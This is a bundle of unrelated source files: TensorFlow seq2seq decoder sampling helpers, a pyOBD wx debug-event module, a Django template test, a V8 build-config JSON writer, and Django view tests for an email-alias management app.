# categorical_sample) mimic TensorFlow Probability distribution semantics.
def _call_sampler(sample_n_fn, sample_shape, name=None):
"""Reshapes vector of samples."""
with ops.name_scope(name, "call_sampler", values=[sample_shape]):
sample_shape = ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32, name="sample_shape")
# Ensure sample_shape is a vector (vs just a scalar).
pad = math_ops.cast(math_ops.equal(array_ops.rank(sample_shape), 0),
dtypes.int32)
sample_shape = array_ops.reshape(
sample_shape,
array_ops.pad(array_ops.shape(sample_shape),
paddings=[[pad, 0]],
constant_values=1))
samples = sample_n_fn(math_ops.reduce_prod(sample_shape))
batch_event_shape = array_ops.shape(samples)[1:]
final_shape = array_ops.concat([sample_shape, batch_event_shape], 0)
return array_ops.reshape(samples, final_shape)
def bernoulli_sample(probs=None, logits=None, dtype=dtypes.int32,
sample_shape=(), seed=None):
"""Samples from Bernoulli distribution."""
if probs is None:
probs = math_ops.sigmoid(logits, name="probs")
else:
probs = ops.convert_to_tensor(probs, name="probs")
batch_shape_tensor = array_ops.shape(probs)
def _sample_n(n):
"""Sample vector of Bernoullis."""
new_shape = array_ops.concat([[n], batch_shape_tensor], 0)
uniform = random_ops.random_uniform(
new_shape, seed=seed, dtype=probs.dtype)
return math_ops.cast(math_ops.less(uniform, probs), dtype)
return _call_sampler(_sample_n, sample_shape)
def categorical_sample(logits, dtype=dtypes.int32,
sample_shape=(), seed=None):
"""Samples from categorical distribution."""
logits = ops.convert_to_tensor(logits, name="logits")
event_size = array_ops.shape(logits)[-1]
batch_shape_tensor = array_ops.shape(logits)[:-1]
def _sample_n(n):
"""Sample vector of categoricals."""
if logits.shape.ndims == 2:
logits_2d = logits
else:
logits_2d = array_ops.reshape(logits, [-1, event_size])
sample_dtype = dtypes.int64 if logits.dtype.size > 4 else dtypes.int32
draws = random_ops.multinomial(
logits_2d, n, seed=seed, output_dtype=sample_dtype)
draws = array_ops.reshape(
array_ops.transpose(draws),
array_ops.concat([[n], batch_shape_tensor], 0))
return math_ops.cast(draws, dtype)
return _call_sampler(_sample_n, sample_shape)
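# Illustrative sketch (not part of the original module): how the samplers above
# are typically used. Output shapes follow the sample_shape + batch_shape
# convention implemented by _call_sampler. Defined but never called here.
def _example_sampler_usage():
  """Hypothetical helper, for illustration only."""
  probs = array_ops.fill([4], 0.3)                # batch of 4 Bernoulli probs
  flips = bernoulli_sample(probs=probs, sample_shape=2)       # shape [2, 4]
  logits = array_ops.zeros([4, 10])               # 4 uniform 10-way categoricals
  draws = categorical_sample(logits=logits, sample_shape=3)   # shape [3, 4]
  return flips, draws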
def _unstack_ta(inp):
return tensor_array_ops.TensorArray(
dtype=inp.dtype, size=array_ops.shape(inp)[0],
element_shape=inp.get_shape()[1:]).unstack(inp)
@six.add_metaclass(abc.ABCMeta)
class Helper(object):
"""Interface for implementing sampling in seq2seq decoders.
Helper instances are used by `BasicDecoder`.
"""
@abc.abstractproperty
def batch_size(self):
"""Batch size of tensor returned by `sample`.
Returns a scalar int32 tensor.
"""
raise NotImplementedError("batch_size has not been implemented")
@abc.abstractproperty
def sample_ids_shape(self):
"""Shape of tensor returned by `sample`, excluding the batch dimension.
Returns a `TensorShape`.
"""
raise NotImplementedError("sample_ids_shape has not been implemented")
@abc.abstractproperty
def sample_ids_dtype(self):
"""DType of tensor returned by `sample`.
Returns a DType.
"""
raise NotImplementedError("sample_ids_dtype has not been implemented")
@abc.abstractmethod
def initialize(self, name=None):
"""Returns `(initial_finished, initial_inputs)`."""
pass
@abc.abstractmethod
def sample(self, time, outputs, state, name=None):
"""Returns `sample_ids`."""
pass
@abc.abstractmethod
def next_inputs(self, time, outputs, state, sample_ids, name=None):
"""Returns `(finished, next_inputs, next_state)`."""
pass
class CustomHelper(Helper):
"""Base abstract class that allows the user to customize sampling."""
def __init__(self, initialize_fn, sample_fn, next_inputs_fn,
sample_ids_shape=None, sample_ids_dtype=None):
"""Initializer.
Args:
initialize_fn: callable that returns `(finished, next_inputs)`
for the first iteration.
sample_fn: callable that takes `(time, outputs, state)`
and emits tensor `sample_ids`.
next_inputs_fn: callable that takes `(time, outputs, state, sample_ids)`
and emits `(finished, next_inputs, next_state)`.
sample_ids_shape: Either a list of integers, or a 1-D Tensor of type
`int32`, the shape of each value in the `sample_ids` batch. Defaults to
a scalar.
sample_ids_dtype: The dtype of the `sample_ids` tensor. Defaults to int32.
"""
self._initialize_fn = initialize_fn
self._sample_fn = sample_fn
self._next_inputs_fn = next_inputs_fn
self._batch_size = None
self._sample_ids_shape = tensor_shape.TensorShape(sample_ids_shape or [])
self._sample_ids_dtype = sample_ids_dtype or dtypes.int32
@property
def batch_size(self):
if self._batch_size is None:
raise ValueError("batch_size accessed before initialize was called")
return self._batch_size
@property
def sample_ids_shape(self):
return self._sample_ids_shape
@property
def sample_ids_dtype(self):
return self._sample_ids_dtype
def initialize(self, name=None):
with ops.name_scope(name, "%sInitialize" % type(self).__name__):
(finished, next_inputs) = self._initialize_fn()
if self._batch_size is None:
self._batch_size = array_ops.size(finished)
return (finished, next_inputs)
def sample(self, time, outputs, state, name=None):
with ops.name_scope(
name, "%sSample" % type(self).__name__, (time, outputs, state)):
return self._sample_fn(time=time, outputs=outputs, state=state)
def next_inputs(self, time, outputs, state, sample_ids, name=None):
with ops.name_scope(
name, "%sNextInputs" % type(self).__name__, (time, outputs, state)):
return self._next_inputs_fn(
time=time, outputs=outputs, state=state, sample_ids=sample_ids)
class TrainingHelper(Helper):
"""A helper for use during training. Only reads inputs.
Returned sample_ids are the argmax of the RNN output logits.
"""
def __init__(self, inputs, sequence_length, time_major=False, name=None):
"""Initializer.
Args:
inputs: A (structure of) input tensors.
sequence_length: An int32 vector tensor.
time_major: Python bool. Whether the tensors in `inputs` are time major.
If `False` (default), they are assumed to be batch major.
name: Name scope for any created operations.
Raises:
ValueError: if `sequence_length` is not a 1D tensor.
"""
with ops.name_scope(name, "TrainingHelper", [inputs, sequence_length]):
inputs = ops.convert_to_tensor(inputs, name="inputs")
self._inputs = inputs
if not time_major:
inputs = nest.map_structure(_transpose_batch_time, inputs)
self._input_tas = nest.map_structure(_unstack_ta, inputs)
self._sequence_length = ops.convert_to_tensor(
sequence_length, name="sequence_length")
if self._sequence_length.get_shape().ndims != 1:
raise ValueError(
"Expected sequence_length to be a vector, but received shape: %s" %
self._sequence_length.get_shape())
self._zero_inputs = nest.map_structure(
lambda inp: array_ops.zeros_like(inp[0, :]), inputs)
self._batch_size = array_ops.size(sequence_length)
@property
def inputs(self):
return self._inputs
@property
def sequence_length(self):
return self._sequence_length
@property
def batch_size(self):
return self._batch_size
@property
def sample_ids_shape(self):
return tensor_shape.TensorShape([])
@property
def sample_ids_dtype(self):
return dtypes.int32
def initialize(self, name=None):
with ops.name_scope(name, "TrainingHelperInitialize"):
finished = math_ops.equal(0, self._sequence_length)
all_finished = math_ops.reduce_all(finished)
next_inputs = control_flow_ops.cond(
all_finished, lambda: self._zero_inputs,
lambda: nest.map_structure(lambda inp: inp.read(0), self._input_tas))
return (finished, next_inputs)
def sample(self, time, outputs, name=None, **unused_kwargs):
with ops.name_scope(name, "TrainingHelperSample", [time, outputs]):
sample_ids = math_ops.cast(
math_ops.argmax(outputs, axis=-1), dtypes.int32)
return sample_ids
def next_inputs(self, time, outputs, state, name=None, **unused_kwargs):
"""next_inputs_fn for TrainingHelper."""
with ops.name_scope(name, "TrainingHelperNextInputs",
[time, outputs, state]):
next_time = time + 1
finished = (next_time >= self._sequence_length)
all_finished = math_ops.reduce_all(finished)
def read_from_ta(inp):
return inp.read(next_time)
next_inputs = control_flow_ops.cond(
all_finished, lambda: self._zero_inputs,
lambda: nest.map_structure(read_from_ta, self._input_tas))
return (finished, next_inputs, state)
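# Illustrative sketch (not part of the original module): during training the
# helper simply replays the ground-truth inputs at each step, e.g.
#
#   helper = TrainingHelper(inputs=decoder_inputs,        # [batch, time, dim]
#                           sequence_length=target_lengths)
#
# and is then passed to a BasicDecoder together with a cell and output layer.
# `decoder_inputs` and `target_lengths` are placeholders for user tensors.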
class ScheduledEmbeddingTrainingHelper(TrainingHelper):
"""A training helper that adds scheduled sampling.
Returns -1s for sample_ids where no sampling took place; valid sample id
values elsewhere.
"""
def __init__(self, inputs, sequence_length, embedding, sampling_probability,
time_major=False, seed=None, scheduling_seed=None, name=None):
"""Initializer.
Args:
inputs: A (structure of) input tensors.
sequence_length: An int32 vector tensor.
embedding: A callable that takes a vector tensor of `ids` (argmax ids),
or the `params` argument for `embedding_lookup`.
sampling_probability: A 0D `float32` tensor: the probability of sampling
categorically from the output ids instead of reading directly from the
inputs.
time_major: Python bool. Whether the tensors in `inputs` are time major.
If `False` (default), they are assumed to be batch major.
seed: The sampling seed.
scheduling_seed: The schedule decision rule sampling seed.
name: Name scope for any created operations.
Raises:
ValueError: if `sampling_probability` is not a scalar or vector.
"""
with ops.name_scope(name, "ScheduledEmbeddingSamplingWrapper",
[embedding, sampling_probability]):
if callable(embedding):
self._embedding_fn = embedding
else:
self._embedding_fn = (
lambda ids: embedding_ops.embedding_lookup(embedding, ids))
self._sampling_probability = ops.convert_to_tensor(
sampling_probability, name="sampling_probability")
if self._sampling_probability.get_shape().ndims not in (0, 1):
raise ValueError(
"sampling_probability must be either a scalar or a vector. "
"saw shape: %s" % (self._sampling_probability.get_shape()))
self._seed = seed
self._scheduling_seed = scheduling_seed
super(ScheduledEmbeddingTrainingHelper, self).__init__(
inputs=inputs,
sequence_length=sequence_length,
time_major=time_major,
name=name)
def initialize(self, name=None):
return super(ScheduledEmbeddingTrainingHelper, self).initialize(name=name)
def sample(self, time, outputs, state, name=None):
with ops.name_scope(name, "ScheduledEmbeddingTrainingHelperSample",
[time, outputs, state]):
# Return -1s where we did not sample, and sample_ids elsewhere
select_sample = bernoulli_sample(
probs=self._sampling_probability,
dtype=dtypes.bool,
sample_shape=self.batch_size,
seed=self._scheduling_seed)
return array_ops.where(
select_sample,
categorical_sample(logits=outputs, seed=self._seed),
gen_array_ops.fill([self.batch_size], -1))
def next_inputs(self, time, outputs, state, sample_ids, name=None):
with ops.name_scope(name, "ScheduledEmbeddingTrainingHelperNextInputs",
[time, outputs, state, sample_ids]):
(finished, base_next_inputs, state) = (
super(ScheduledEmbeddingTrainingHelper, self).next_inputs(
time=time,
outputs=outputs,
state=state,
sample_ids=sample_ids,
name=name))
def maybe_sample():
"""Perform scheduled sampling."""
where_sampling = math_ops.cast(
array_ops.where(sample_ids > -1), dtypes.int32)
where_not_sampling = math_ops.cast(
array_ops.where(sample_ids <= -1), dtypes.int32)
sample_ids_sampling = array_ops.gather_nd(sample_ids, where_sampling)
inputs_not_sampling = array_ops.gather_nd(
base_next_inputs, where_not_sampling)
sampled_next_inputs = self._embedding_fn(sample_ids_sampling)
base_shape = array_ops.shape(base_next_inputs)
return (array_ops.scatter_nd(indices=where_sampling,
updates=sampled_next_inputs,
shape=base_shape)
+ array_ops.scatter_nd(indices=where_not_sampling,
updates=inputs_not_sampling,
shape=base_shape))
all_finished = math_ops.reduce_all(finished)
next_inputs = control_flow_ops.cond(
all_finished, lambda: base_next_inputs, maybe_sample)
return (finished, next_inputs, state)
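# Illustrative sketch (not part of the original module): scheduled sampling
# mixes ground-truth inputs with embedded model samples, e.g.
#
#   helper = ScheduledEmbeddingTrainingHelper(
#       inputs=decoder_inputs, sequence_length=target_lengths,
#       embedding=embedding_matrix, sampling_probability=0.25)
#
# All tensor names above are placeholders for user-provided values.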
class ScheduledOutputTrainingHelper(TrainingHelper):
"""A training helper that adds scheduled sampling directly to outputs.
Returns False for sample_ids where no sampling took place; True elsewhere.
"""
def __init__(self, inputs, sequence_length, sampling_probability,
time_major=False, seed=None, next_inputs_fn=None,
auxiliary_inputs=None, name=None):
"""Initializer.
Args:
      inputs: A (structure of) input tensors.
sequence_length: An int32 vector tensor.
sampling_probability: A 0D `float32` tensor: the probability of sampling
from the outputs instead of reading directly from the inputs.
time_major: Python bool. Whether the tensors in `inputs` are time major.
If `False` (default), they are assumed to be batch major.
seed: The sampling seed.
next_inputs_fn: (Optional) callable to apply to the RNN outputs to create
the next input when sampling. If `None` (default), the RNN outputs will
be used as the next inputs.
auxiliary_inputs: An optional (structure of) auxiliary input tensors with
a shape that matches `inputs` in all but (potentially) the final
dimension. These tensors will be concatenated to the sampled output or
the `inputs` when not sampling for use as the next input.
name: Name scope for any created operations.
Raises:
ValueError: if `sampling_probability` is not a scalar or vector.
"""
with ops.name_scope(name, "ScheduledOutputTrainingHelper",
[inputs, auxiliary_inputs, sampling_probability]):
self._sampling_probability = ops.convert_to_tensor(
sampling_probability, name="sampling_probability")
if self._sampling_probability.get_shape().ndims not in (0, 1):
raise ValueError(
"sampling_probability must be either a scalar or a vector. "
"saw shape: %s" % (self._sampling_probability.get_shape()))
if auxiliary_inputs is None:
maybe_concatenated_inputs = inputs
else:
inputs = ops.convert_to_tensor(inputs, name="inputs")
auxiliary_inputs = ops.convert_to_tensor(
auxiliary_inputs, name="auxiliary_inputs")
maybe_concatenated_inputs = nest.map_structure(
lambda x, y: array_ops.concat((x, y), -1),
inputs, auxiliary_inputs)
if not time_major:
auxiliary_inputs = nest.map_structure(
_transpose_batch_time, auxiliary_inputs)
self._auxiliary_input_tas = (
nest.map_structure(_unstack_ta, auxiliary_inputs)
if auxiliary_inputs is not None else None)
self._seed = seed
self._next_inputs_fn = next_inputs_fn
super(ScheduledOutputTrainingHelper, self).__init__(
inputs=maybe_concatenated_inputs,
sequence_length=sequence_length,
time_major=time_major,
name=name)
def initialize(self, name=None):
return super(ScheduledOutputTrainingHelper, self).initialize(name=name)
def sample(self, time, outputs, state, name=None):
with ops.name_scope(name, "ScheduledOutputTrainingHelperSample",
[time, outputs, state]):
return bernoulli_sample(
probs=self._sampling_probability,
sample_shape=self.batch_size,
seed=self._seed)
def next_inputs(self, time, outputs, state, sample_ids, name=None):
with ops.name_scope(name, "ScheduledOutputTrainingHelperNextInputs",
[time, outputs, state, sample_ids]):
(finished, base_next_inputs, state) = (
super(ScheduledOutputTrainingHelper, self).next_inputs(
time=time,
outputs=outputs,
state=state,
sample_ids=sample_ids,
name=name))
sample_ids = math_ops.cast(sample_ids, dtypes.bool)
def maybe_sample():
"""Perform scheduled sampling."""
def maybe_concatenate_auxiliary_inputs(outputs_, indices=None):
"""Concatenate outputs with auxiliary inputs, if they exist."""
if self._auxiliary_input_tas is None:
return outputs_
next_time = time + 1
auxiliary_inputs = nest.map_structure(
lambda ta: ta.read(next_time), self._auxiliary_input_tas)
if indices is not None:
auxiliary_inputs = array_ops.gather_nd(auxiliary_inputs, indices)
return nest.map_structure(
lambda x, y: array_ops.concat((x, y), -1),
outputs_, auxiliary_inputs)
if self._next_inputs_fn is None:
return array_ops.where(
sample_ids, maybe_concatenate_auxiliary_inputs(outputs),
base_next_inputs)
where_sampling = math_ops.cast(
array_ops.where(sample_ids), dtypes.int32)
where_not_sampling = math_ops.cast(
array_ops.where(math_ops.logical_not(sample_ids)), dtypes.int32)
outputs_sampling = array_ops.gather_nd(outputs, where_sampling)
inputs_not_sampling = array_ops.gather_nd(base_next_inputs,
where_not_sampling)
sampled_next_inputs = maybe_concatenate_auxiliary_inputs(
self._next_inputs_fn(outputs_sampling), where_sampling)
base_shape = array_ops.shape(base_next_inputs)
return (array_ops.scatter_nd(indices=where_sampling,
updates=sampled_next_inputs,
shape=base_shape)
+ array_ops.scatter_nd(indices=where_not_sampling,
updates=inputs_not_sampling,
shape=base_shape))
all_finished = math_ops.reduce_all(finished)
no_samples = math_ops.logical_not(math_ops.reduce_any(sample_ids))
next_inputs = control_flow_ops.cond(
math_ops.logical_or(all_finished, no_samples),
lambda: base_next_inputs, maybe_sample)
return (finished, next_inputs, state)
class GreedyEmbeddingHelper(Helper):
"""A helper for use during inference.
Uses the argmax of the output (treated as logits) and passes the
result through an embedding layer to get the next input.
"""
def __init__(self, embedding, start_tokens, end_token):
"""Initializer.
Args:
embedding: A callable that takes a vector tensor of `ids` (argmax ids),
or the `params` argument for `embedding_lookup`. The returned tensor
will be passed to the decoder input.
start_tokens: `int32` vector shaped `[batch_size]`, the start tokens.
end_token: `int32` scalar, the token that marks end of decoding.
Raises:
ValueError: if `start_tokens` is not a 1D tensor or `end_token` is not a
scalar.
"""
if callable(embedding):
self._embedding_fn = embedding
else:
self._embedding_fn = (
lambda ids: embedding_ops.embedding_lookup(embedding, ids))
self._start_tokens = ops.convert_to_tensor(
start_tokens, dtype=dtypes.int32, name="start_tokens")
self._end_token = ops.convert_to_tensor(
end_token, dtype=dtypes.int32, name="end_token")
if self._start_tokens.get_shape().ndims != 1:
raise ValueError("start_tokens must be a vector")
self._batch_size = array_ops.size(start_tokens)
if self._end_token.get_shape().ndims != 0:
raise ValueError("end_token must be a scalar")
self._start_inputs = self._embedding_fn(self._start_tokens)
@property
def batch_size(self):
return self._batch_size
@property
def sample_ids_shape(self):
return tensor_shape.TensorShape([])
@property
def sample_ids_dtype(self):
return dtypes.int32
def initialize(self, name=None):
finished = array_ops.tile([False], [self._batch_size])
return (finished, self._start_inputs)
def sample(self, time, outputs, state, name=None):
"""sample for GreedyEmbeddingHelper."""
del time, state # unused by sample_fn
# Outputs are logits, use argmax to get the most probable id
if not isinstance(outputs, ops.Tensor):
raise TypeError("Expected outputs to be a single Tensor, got: %s" %
type(outputs))
sample_ids = math_ops.argmax(outputs, axis=-1, output_type=dtypes.int32)
return sample_ids
def next_inputs(self, time, outputs, state, sample_ids, name=None):
"""next_inputs_fn for GreedyEmbeddingHelper."""
del time, outputs # unused by next_inputs_fn
finished = math_ops.equal(sample_ids, self._end_token)
all_finished = math_ops.reduce_all(finished)
next_inputs = control_flow_ops.cond(
all_finished,
# If we're finished, the next_inputs value doesn't matter
lambda: self._start_inputs,
lambda: self._embedding_fn(sample_ids))
return (finished, next_inputs, state)
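# Illustrative sketch (not part of the original module): greedy inference feeds
# the argmax id of each step back through the embedding, e.g.
#
#   helper = GreedyEmbeddingHelper(
#       embedding=embedding_matrix,       # or a callable mapping ids to vectors
#       start_tokens=array_ops.fill([batch_size], GO_ID),
#       end_token=EOS_ID)
#
# `embedding_matrix`, `batch_size`, `GO_ID` and `EOS_ID` are placeholders for
# user-provided values.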
class SampleEmbeddingHelper(GreedyEmbeddingHelper):
"""A helper for use during inference.
Uses sampling (from a distribution) instead of argmax and passes the
result through an embedding layer to get the next input.
"""
def __init__(self, embedding, start_tokens, end_token,
softmax_temperature=None, seed=None):
"""Initializer.
Args:
embedding: A callable that takes a vector tensor of `ids` (argmax ids),
or the `params` argument for `embedding_lookup`. The returned tensor
will be passed to the decoder input.
start_tokens: `int32` vector shaped `[batch_size]`, the start tokens.
end_token: `int32` scalar, the token that marks end of decoding.
softmax_temperature: (Optional) `float32` scalar, value to divide the
logits by before computing the softmax. Larger values (above 1.0) result
in more random samples, while smaller values push the sampling
distribution towards the argmax. Must be strictly greater than 0.
Defaults to 1.0.
seed: (Optional) The sampling seed.
Raises:
ValueError: if `start_tokens` is not a 1D tensor or `end_token` is not a
scalar.
"""
super(SampleEmbeddingHelper, self).__init__(
embedding, start_tokens, end_token)
self._softmax_temperature = softmax_temperature
self._seed = seed
def sample(self, time, outputs, state, name=None):
"""sample for SampleEmbeddingHelper."""
del time, state # unused by sample_fn
# Outputs are logits, we sample instead of argmax (greedy).
if not isinstance(outputs, ops.Tensor):
raise TypeError("Expected outputs to be a single Tensor, got: %s" %
type(outputs))
if self._softmax_temperature is None:
logits = outputs
else:
logits = outputs / self._softmax_temperature
sample_ids = categorical_sample(logits=logits, seed=self._seed)
return sample_ids
class InferenceHelper(Helper):
"""A helper to use during inference with a custom sampling function."""
def __init__(self, sample_fn, sample_shape, sample_dtype,
start_inputs, end_fn, next_inputs_fn=None):
"""Initializer.
Args:
sample_fn: A callable that takes `outputs` and emits tensor `sample_ids`.
sample_shape: Either a list of integers, or a 1-D Tensor of type `int32`,
        the shape of each sample in the batch returned by `sample_fn`.
sample_dtype: the dtype of the sample returned by `sample_fn`.
start_inputs: The initial batch of inputs.
end_fn: A callable that takes `sample_ids` and emits a `bool` vector
shaped `[batch_size]` indicating whether each sample is an end token.
next_inputs_fn: (Optional) A callable that takes `sample_ids` and returns
the next batch of inputs. If not provided, `sample_ids` is used as the
next batch of inputs.
"""
self._sample_fn = sample_fn
self._end_fn = end_fn
self._sample_shape = tensor_shape.TensorShape(sample_shape)
self._sample_dtype = sample_dtype
self._next_inputs_fn = next_inputs_fn
self._batch_size = array_ops.shape(start_inputs)[0]
self._start_inputs = ops.convert_to_tensor(
start_inputs, name="start_inputs")
@property
def batch_size(self):
return self._batch_size
@property
def sample_ids_shape(self):
return self._sample_shape
@property
def sample_ids_dtype(self):
return self._sample_dtype
def initialize(self, name=None):
finished = array_ops.tile([False], [self._batch_size])
return (finished, self._start_inputs)
def sample(self, time, outputs, state, name=None):
del time, state # unused by sample
return self._sample_fn(outputs)
def next_inputs(self, time, outputs, state, sample_ids, name=None):
del time, outputs # unused by next_inputs
if self._next_inputs_fn is None:
next_inputs = sample_ids
else:
next_inputs = self._next_inputs_fn(sample_ids)
finished = self._end_fn(sample_ids)
return (finished, next_inputs, state)
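# Illustrative sketch (not part of the original module): a custom inference
# loop that thresholds sigmoid outputs and stops once every value in a sample
# falls below the threshold. All names below are hypothetical user code.
#
#   helper = InferenceHelper(
#       sample_fn=lambda outputs: math_ops.cast(outputs > 0.5, dtypes.float32),
#       sample_shape=[output_dim],
#       sample_dtype=dtypes.float32,
#       start_inputs=start_frames,        # [batch, output_dim]
#       end_fn=lambda sample_ids: math_ops.reduce_all(sample_ids < 0.5, -1))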
|
mentosso/pyobd-pi
|
refs/heads/master
|
debugEvent.py
|
18
|
#!/usr/bin/env python
###########################################################################
# obd_sensors.py
#
# Copyright 2004 Donour Sizemore (donour@uchicago.edu)
# Copyright 2009 Secons Ltd. (www.obdtester.com)
#
# This file is part of pyOBD.
#
# pyOBD is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pyOBD is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyOBD; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
###########################################################################
try:
import wx
EVT_DEBUG_ID = 1010
def debug_display(window, position, message):
if window is None:
print message
else:
wx.PostEvent(window, DebugEvent([position, message]))
class DebugEvent(wx.PyEvent):
"""Simple event to carry arbitrary result data."""
def __init__(self, data):
"""Init Result Event."""
wx.PyEvent.__init__(self)
self.SetEventType(EVT_DEBUG_ID)
self.data = data
except ImportError as e:
def debug_display(window, position, message):
print message
|
fafaman/django
|
refs/heads/master
|
tests/webdesign_tests/tests.py
|
251
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.template import Context, Template
from django.test import SimpleTestCase, modify_settings
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.webdesign'})
class WebdesignTest(SimpleTestCase):
def test_lorem_tag(self):
t = Template("{% load webdesign %}{% lorem 3 w %}")
self.assertEqual(t.render(Context({})),
'lorem ipsum dolor')
|
hoho/dosido
|
refs/heads/master
|
nodejs/deps/v8/tools/testrunner/utils/dump_build_config.py
|
11
|
# Copyright 2016 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Writes a dictionary to a json file with the passed key-value pairs.
Expected to be called like:
dump_build_config.py path/to/file.json [key1=value1 ...]
The values are expected to be valid json. E.g. true is a boolean and "true" is
the string "true".
"""
import json
import os
import sys
assert len(sys.argv) > 1
def as_json(kv):
assert '=' in kv
k, v = kv.split('=', 1)
return k, json.loads(v)
with open(sys.argv[1], 'w') as f:
json.dump(dict(as_json(kv) for kv in sys.argv[2:]), f)
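# Illustrative invocation (not part of the original script), following the
# docstring above; every value must parse as JSON:
#
#   $ python dump_build_config.py out/build_config.json is_debug=true arch='"x64"'
#
# which would write {"is_debug": true, "arch": "x64"} to out/build_config.json.
# The file path and keys are examples only.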
|
daniellawrence/django-vutman
|
refs/heads/master
|
tests/test_view.py
|
1
|
from django.test import TestCase, Client
from vutman.models import EmailAlias, EmailUser, EmailDomain, EmailServer
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
class SimpleTestCase(TestCase):
def setUp(self):
self.client = Client()
self.request_user = User.objects.create_user('admin',
'admin@local.host',
'password'
)
self.request_user.save()
self.client.login(username="admin",
password="password")
self.server = EmailServer.objects.create(email_server="server")
self.domain = EmailDomain.objects.create(domain_name="domain")
self.user = EmailUser.objects.create(
username="username",
fullname="first last",
email_server=self.server,
active_directory_basedn="basedn"
)
self.alias = EmailAlias.objects.create(
alias_name="alias",
username=self.user,
email_domain=self.domain
)
self.user2 = EmailUser.objects.create(
username="username2",
fullname="first last2",
email_server=self.server,
active_directory_basedn="basedn2"
)
self.alias2 = EmailAlias.objects.create(
alias_name="alias2",
username=self.user2,
email_domain=self.domain
)
def test_index_access_login(self):
self.client.login(username="admin",
password="password")
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
def test_search_no_q(self):
response = self.client.get(reverse('search'), args=[])
self.assertEqual(response.context, None)
self.assertEqual(response.status_code, 302)
def test_search_bad_q(self):
response = self.client.get(reverse('search'), args={'q': 'BAD_SEARCH'})
self.assertEqual(response.context, None)
self.assertEqual(response.status_code, 302)
response = self.client.get(reverse('search'), args={'q': ''})
self.assertEqual(response.context, None)
self.assertEqual(response.status_code, 302)
response = self.client.get(reverse('search'), args={'q': None})
self.assertEqual(response.context, None)
self.assertEqual(response.status_code, 302)
def test_search_good(self):
response = self.client.get(reverse('search'),
{'q': 'a', 'alias': 'on', 'user': 'on'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['all_list']), 4)
self.assertEqual(len(response.context[-1]['alias_list']), 2)
self.assertEqual(len(response.context[-1]['user_list']), 2)
def test_search_good_find_nothing_redirect_index(self):
response = self.client.get(reverse('search'), {
'q': 'WILL_NOT_MATCH', 'alias': 'on', 'user': 'on'
})
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
def test_search_good_find_single_user_redirect_to_page(self):
response = self.client.get(reverse('search'), {
'q': 'username2', 'alias': 'on', 'user': 'on'
})
self.assertEqual(response.status_code, 302)
self.assertIn(self.user2.get_absolute_url(), response.url)
self.assertIn('one_user', response.url)
def test_search_good_find_single_alias_redirect_to_page(self):
response = self.client.get(reverse('search'), {
'q': 'alias2', 'alias': 'on', 'user': 'on'
})
self.assertEqual(response.status_code, 302)
self.assertIn(self.user2.get_absolute_url(), response.url)
self.assertIn('one_alias', response.url)
def test_search_only_aliases(self):
response = self.client.get(reverse('search'),
{'q': 'a', 'alias': 'on'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['all_list']), 2)
self.assertEqual(len(response.context[-1]['alias_list']), 2)
self.assertEqual(len(response.context[-1]['user_list']), 0)
def test_search_only_users(self):
response = self.client.get(reverse('search'),
{'q': 'a', 'user': 'on'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['all_list']), 2)
self.assertEqual(len(response.context[-1]['alias_list']), 0)
self.assertEqual(len(response.context[-1]['user_list']), 2)
def test_search_1users_many_aliases(self):
# domain = EmailDomain.objects.create(email_server="domain2")
EmailUser.objects.create(
username="domain21",
fullname="first last",
email_server=self.server,
active_directory_basedn="basedn"
).save()
EmailUser.objects.create(
username="domain",
fullname="first last",
email_server=self.server,
active_directory_basedn="basedn"
).save()
EmailAlias.objects.create(
alias_name="domain2",
username=self.user2,
email_domain=self.domain
).save()
EmailAlias.objects.create(
alias_name="domain21",
username=self.user,
email_domain=self.domain
).save()
response = self.client.get(
reverse('search'),
{
'q': 'domain2', 'user': 'on', 'alias': 'on'
}
)
self.assertEqual(response.status_code, 200)
def test_render_vut(self):
response = self.client.get(reverse('render_vut'))
self.assertEqual(response.status_code, 200)
# self.assertEqual(len(response.context[-1]['alias_list']), 2)
def test_emailuser_details(self):
response = self.client.get(self.user.get_absolute_url())
self.assertEqual(response.status_code, 200)
def test_emailalias_delete(self):
response = self.client.get(reverse('emailalias.delete',
kwargs={'pk': self.alias.pk}))
# messages = self.client.get_and_delete_messages()
# print(messages)
self.assertEqual(response.status_code, 302)
self.assertIn(self.user.get_absolute_url(), response.url)
def test_emailalias_delete_missing_id(self):
response = self.client.get(reverse('emailalias.delete',
kwargs={'pk': 10000}))
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
def test_emaildetails_get(self):
response = self.client.get(self.user.get_absolute_url())
self.assertEqual(response.status_code, 200)
response = self.client.get(self.user.get_absolute_url(),
{'pk': self.user.pk})
self.assertEqual(response.status_code, 200)
response = self.client.post(self.user.get_absolute_url(),
{'pk': self.user.pk})
self.assertEqual(response.status_code, 200)
def test_aliasdetails_via_bad_post(self):
response = self.client.post(
reverse('emailalias.details', kwargs={'pk': self.alias.pk}),
{}
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.alias.username.get_absolute_url(), response.url)
def test_aliasdetails_via_ok_post(self):
response = self.client.post(
reverse('emailalias.details', kwargs={'pk': self.alias.pk}),
{'pk': self.alias.pk, 'username': self.user.pk},
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.alias.username.get_absolute_url(), response.url)
def test_aliasdetails_via_good_post(self):
response = self.client.post(
reverse('emailalias.details', kwargs={'pk': self.alias.pk}),
{
'pk': self.alias.pk,
'username': self.user.pk,
'email_domain': self.domain.pk,
'alias_name': 'alias_name',
'state': 'E'
},
)
self.assertEqual(response.status_code, 302)
